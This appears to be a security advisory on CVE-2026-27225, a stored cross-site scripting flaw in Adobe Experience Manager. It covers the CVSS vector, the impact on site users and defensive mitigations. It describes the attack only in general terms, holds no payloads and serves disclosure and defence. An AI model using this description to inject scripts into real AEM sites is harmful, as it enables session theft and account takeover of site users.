CVE-2026-27225 is a stored Cross-Site Scripting (XSS) vulnerability affecting Adobe Experience Manager (AEM) versions 6.5.23 and earlier. Stored XSS occurs when malicious input is saved by the application and later rendered in users' browsers without proper sanitization or encoding. In this case, low-privileged attackers can inject arbitrary JavaScript code into vulnerable form fields within AEM-managed web pages. When other users access these pages, the injected scripts execute in their browsers under the context of the vulnerable domain, potentially allowing attackers to steal session cookies, perform actions on behalf of users, or redirect victims to malicious sites. The vulnerability requires the attacker to have at least low-level privileges to submit malicious input, and victims must interact by visiting the compromised pages. The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) indicates network attack vector, low attack complexity, low privileges required, user interaction required, scope change, and limited confidentiality and integrity impact without affecting availability. Although no known exploits are reported in the wild, the vulnerability poses a moderate risk due to the widespread use of AEM in enterprise content management. The lack of a published patch at the time of disclosure necessitates immediate mitigation efforts to prevent exploitation.

The impact of this stored XSS vulnerability includes potential theft of user credentials, session hijacking, unauthorized actions performed on behalf of users, and distribution of malware through malicious scripts. For organizations, this can lead to compromised user accounts, data breaches, reputational damage, and regulatory compliance issues. Since AEM is widely used by enterprises and government agencies for managing web content, exploitation could affect a large number of users and sensitive information. The scope change in the CVSS vector suggests that the vulnerability could impact multiple users beyond the initial attacker, increasing the potential damage. Although availability is not affected, the confidentiality and integrity of user data and interactions are at risk. The requirement for user interaction and low privileges reduces the ease of exploitation but does not eliminate the threat, especially in environments with many users and public-facing content.

Organizations should immediately review and sanitize all user input fields in Adobe Experience Manager to prevent injection of malicious scripts. Implement strict input validation and output encoding on all form fields, especially those that store and display user-generated content. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in browsers. Monitor web application logs for suspicious input patterns indicative of XSS attempts. Limit user privileges to the minimum necessary to reduce the risk of malicious input submission. Until an official patch is released, consider disabling or restricting vulnerable form functionalities or isolating affected AEM instances from public access. Conduct regular security assessments and penetration testing focused on XSS vulnerabilities. Educate users about the risks of clicking unknown links or visiting untrusted pages within the organization’s web environment.